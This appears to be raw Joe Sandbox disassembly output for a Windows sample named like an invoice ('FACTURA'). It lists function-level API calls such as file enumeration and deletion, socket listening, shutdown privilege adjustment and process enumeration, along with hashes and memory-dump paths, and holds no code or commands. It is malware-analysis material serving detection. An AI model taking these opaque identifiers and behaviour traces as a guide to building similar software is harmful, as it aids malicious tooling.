                                                                            • Opcode Fuzzy Hash: 3ce6485f31d8b6e3f97ce220c3981963fc6f642b588d88a8a65a40fb3483f34d
                                                                            • Instruction Fuzzy Hash: 1A51917280514C9ACF01EBA4C992DEDB7B9EF14320F6000AAE44277291EF316F0EDB61
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F3F440
                                                                            • Sleep.KERNEL32(0000000A), ref: 00F3F470
                                                                            • _wcscmp.LIBCMT ref: 00F3F484
                                                                            • _wcscmp.LIBCMT ref: 00F3F49F
                                                                            • FindNextFileW.KERNEL32(?,?), ref: 00F3F53D
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F553
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                            • String ID: *.*
                                                                            • API String ID: 713712311-438819550
                                                                            • Opcode ID: a473899cb507e9a7aa570d3152754ef977c131a6dfd385780f8336b42ae96b9d
                                                                            • Instruction ID: 22966fcf1acaf5ae2948b878e46da529dec0b312d9a4c610c7c847139ae9a400
                                                                            • Opcode Fuzzy Hash: a473899cb507e9a7aa570d3152754ef977c131a6dfd385780f8336b42ae96b9d
                                                                            • Instruction Fuzzy Hash: 6C415C72D0021AAFCF54EF64DC55AEEBBB4FF05320F144466E855A3291EB309E49EB50
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00F5D47C
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00F5D49C
                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F5D6D7
                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F5D6F5
                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F5D716
                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00F5D735
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00F5D75A
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00F5D77D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                                                            • String ID:
                                                                            • API String ID: 830902736-0
                                                                            • Opcode ID: 658b86253d0a1d0f9cc4a94409b186cdeed22876edb12720d9e3438306f94b80
                                                                            • Instruction ID: 642124abd1cd324cee9076ca3013b8b0a7fcda4d7c9c8768fa54b778d37d52e5
                                                                            • Opcode Fuzzy Hash: 658b86253d0a1d0f9cc4a94409b186cdeed22876edb12720d9e3438306f94b80
                                                                            • Instruction Fuzzy Hash: 2FB18B71A01219EBDF24CF68C9857AD7BB1FF08712F088069EE489F295D734A958EB50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __itow__swprintf
                                                                            • String ID: 3c$_
                                                                            • API String ID: 674341424-4099079164
                                                                            • Opcode ID: 12ed73d9c38ea62b157b357542dc4b0d2016768809c4c5f5decb7b67732f24a6
                                                                            • Instruction ID: 2982017ba8f62e4baac605d47b03655930465c16485f9c8ef281e4f8785ecc0f
                                                                            • Opcode Fuzzy Hash: 12ed73d9c38ea62b157b357542dc4b0d2016768809c4c5f5decb7b67732f24a6
                                                                            • Instruction Fuzzy Hash: 0F22BC716083449FC724DF25C881BAEB7E4EF84714F00592DF99AA7392EB31E945CB92
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 55a5d2e4ca2f7b288d5739923caaf11ce6798abe66a1359bca63a25bd2334b58
                                                                            • Instruction ID: eec38a59269f32e16b6cc63a3df647523ef4f03922b710d0c0a456815c365171
                                                                            • Opcode Fuzzy Hash: 55a5d2e4ca2f7b288d5739923caaf11ce6798abe66a1359bca63a25bd2334b58
                                                                            • Instruction Fuzzy Hash: A812B971A00619DFDF04DFA5D981AEEB7F5FF48304F10952AE806B7292EB36A911CB50
                                                                            APIs
                                                                              • Part of subcall function 00ED4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00ED4743,?,?,00ED37AE,?), ref: 00ED4770
                                                                              • Part of subcall function 00F34A31: GetFileAttributesW.KERNEL32(?,00F3370B), ref: 00F34A32
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F33B89
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F33BD9
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F33BEA
                                                                            • FindClose.KERNEL32(00000000), ref: 00F33C01
                                                                            • FindClose.KERNEL32(00000000), ref: 00F33C0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: 4a37549b7b6bf36919baf671e656b1c3b34bc33a6d821bc0a6c679c3aba0fa81
                                                                            • Instruction ID: 618c285c0316cc8ac124e1ab029f3e26eb5bfd16781d7d4791af81bed18989fa
                                                                            • Opcode Fuzzy Hash: 4a37549b7b6bf36919baf671e656b1c3b34bc33a6d821bc0a6c679c3aba0fa81
                                                                            • Instruction Fuzzy Hash: 75317E714083859FC301EF24D8918AFB7E8AE95324F405D6EF4E5A2291EB21DA0ED763
                                                                            APIs
                                                                              • Part of subcall function 00F287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F2882B
                                                                              • Part of subcall function 00F287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F28858
                                                                              • Part of subcall function 00F287E1: GetLastError.KERNEL32 ref: 00F28865
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00F351F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-194228
                                                                            • Opcode ID: 9451ccf81bf24ae853be861e2bdf0085e4b15a15ce6463bfd07c013764ad9e30
                                                                            • Instruction ID: 1cc384a564c4ecce767480e34c5ac64cc7019d58a0d1fc3106c8cd6962cf134e
                                                                            • Opcode Fuzzy Hash: 9451ccf81bf24ae853be861e2bdf0085e4b15a15ce6463bfd07c013764ad9e30
                                                                            • Instruction Fuzzy Hash: A8012B32B916156BF7287268AC8AFBB7258DB85B71F240460F903E20D2DA51DC05B590
                                                                            APIs
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00F462DC
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F462EB
                                                                            • bind.WS2_32(00000000,?,00000010), ref: 00F46307
                                                                            • listen.WS2_32(00000000,00000005), ref: 00F46316
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F46330
                                                                            • closesocket.WS2_32(00000000), ref: 00F46344
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                            • String ID:
                                                                            • API String ID: 1279440585-0
                                                                            • Opcode ID: 1f6bc309907326292a717a79a88b407daab77b68744bbd362cc48dc42163bf95
                                                                            • Instruction ID: e9465f496db65f2a189ccc08ad2f4c646a530dfe3cc063f79e8596bbace5b440
                                                                            • Opcode Fuzzy Hash: 1f6bc309907326292a717a79a88b407daab77b68744bbd362cc48dc42163bf95
                                                                            • Instruction Fuzzy Hash: 0D21DD356002049FCB00AF64DC45A3EBBE8EF49721F14415AE916E73D2C770AC05EB51
                                                                            APIs
                                                                              • Part of subcall function 00EF0DB6: std::exception::exception.LIBCMT ref: 00EF0DEC
                                                                              • Part of subcall function 00EF0DB6: __CxxThrowException@8.LIBCMT ref: 00EF0E01
                                                                            • _memmove.LIBCMT ref: 00F20258
                                                                            • _memmove.LIBCMT ref: 00F2036D
                                                                            • _memmove.LIBCMT ref: 00F20414
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1300846289-0
                                                                            • Opcode ID: 19de64c72c7374b70ca7e8716d14ac4db754a4f35d215d59387776d0d2c919b8
                                                                            • Instruction ID: c617093a41ba8fd4869d35099677ec592bc845bbd41167cfc825f3cfa830353a
                                                                            • Opcode Fuzzy Hash: 19de64c72c7374b70ca7e8716d14ac4db754a4f35d215d59387776d0d2c919b8
                                                                            • Instruction Fuzzy Hash: 4B02CFB1A00219DBCF04DF64D981ABEBBF5EF44310F14806AE806EB296EB31DD51DB91
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00ED19FA
                                                                            • GetSysColor.USER32(0000000F), ref: 00ED1A4E
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00ED1A61
                                                                              • Part of subcall function 00ED1290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00ED12D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ColorDialogNtdllProc_$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 591255283-0
                                                                            • Opcode ID: 27be331744f096c03b91476c6e11b9456af870640bb04343a2e00147f17f22be
                                                                            • Instruction ID: dc708f54f32bf1bd0a75d51a9bb30f02f663c04fd1d458c936437db4283eb779
                                                                            • Opcode Fuzzy Hash: 27be331744f096c03b91476c6e11b9456af870640bb04343a2e00147f17f22be
                                                                            • Instruction Fuzzy Hash: 11A15C71106558BEEA28AB284C54EBF359CDB42356F14115FFA02F53D6CA28DD03B3B2
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F3BCE6
                                                                            • _wcscmp.LIBCMT ref: 00F3BD16
                                                                            • _wcscmp.LIBCMT ref: 00F3BD2B
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F3BD3C
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F3BD6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 2387731787-0
                                                                            • Opcode ID: dc94bf99a35730530acdf99f0db1f93259fb76a3234c1034fa1d51e8b9d6299e
                                                                            • Instruction ID: 8a6e8664dfff5e57bf795e30254cb7c398a072e8279c10b4e89374ed44ee72e7
                                                                            • Opcode Fuzzy Hash: dc94bf99a35730530acdf99f0db1f93259fb76a3234c1034fa1d51e8b9d6299e
                                                                            • Instruction Fuzzy Hash: 1D51AD75A046029FC718DF28C8A1EAAB3E4EF49320F00465EEA56973A1DB30ED05DB91
                                                                            APIs
                                                                              • Part of subcall function 00F47D8B: inet_addr.WS2_32(00000000), ref: 00F47DB6
                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 00F4679E
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F467C7
                                                                            • bind.WS2_32(00000000,?,00000010), ref: 00F46800
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F4680D
                                                                            • closesocket.WS2_32(00000000), ref: 00F46821
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 99427753-0
                                                                            • Opcode ID: 6b159979e0d8d779fb75d44bfd486acc8a7ef30f4661c197900860ca93fcc881
                                                                            • Instruction ID: 66db8a4c81f1d1cf08fd5203e63ad12707c65f79de8eb378b86bb6039d421736
                                                                            • Opcode Fuzzy Hash: 6b159979e0d8d779fb75d44bfd486acc8a7ef30f4661c197900860ca93fcc881
                                                                            • Instruction Fuzzy Hash: BD41C275A00214AFDB10BF68DC86F2E77E8DF09B24F048459FA15AB3D3CA749D019792
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: b74cc6ee8afac74ae50acbafc010d3f4a258ebf873d84f659c1775fb998221c4
                                                                            • Instruction ID: 4e55134f24e6357f8faff0e7f5c7ec3aac2b3a2c42e3c108435235944501b881
                                                                            • Opcode Fuzzy Hash: b74cc6ee8afac74ae50acbafc010d3f4a258ebf873d84f659c1775fb998221c4
                                                                            • Instruction Fuzzy Hash: 35110431700A14AFDB216F26DC64A2E7B9AEF44BA2B444029FE49D7241DB70DC06A6A0
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F280C0
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F280CA
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F280D9
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00F280E0
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F280F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 47921759-0
                                                                            • Opcode ID: c2a30cd30549c3daa72a9e202d71ff800bf2c8453f3129a0f2c3a37d00764346
                                                                            • Instruction ID: e03fb1ae6e5cf79c85004e83fe1da9f2970fa065c90964a9c7afc86e6f8f0c06
                                                                            • Opcode Fuzzy Hash: c2a30cd30549c3daa72a9e202d71ff800bf2c8453f3129a0f2c3a37d00764346
                                                                            • Instruction Fuzzy Hash: 8FF06231246318AFEB100FA5EC8DE6B3BACEF497A6B040065FA45C7190CB619C56EA60
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00F4EE3D
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00F4EE4B
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00F4EF0B
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F4EF1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                            • String ID:
                                                                            • API String ID: 2576544623-0
                                                                            • Opcode ID: a7b3e06dcc4cceeac924840714025728488650dece1cce7ec300cf7f7f01f31f
                                                                            • Instruction ID: 8d15dab1b9333a2553ecb49bf6e21a4657ae7e9d16114e7dd4509e241fd22c91
                                                                            • Opcode Fuzzy Hash: a7b3e06dcc4cceeac924840714025728488650dece1cce7ec300cf7f7f01f31f
                                                                            • Instruction Fuzzy Hash: 825171715047159FD310EF24DC81E6BBBE8FF94710F10582EF995972A1EB709909CB92
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • GetCursorPos.USER32(?), ref: 00F5C4D2
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F0B9AB,?,?,?,?,?), ref: 00F5C4E7
                                                                            • GetCursorPos.USER32(?), ref: 00F5C534
                                                                            • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F0B9AB,?,?,?), ref: 00F5C56E
                                                                            Memory Dump Source
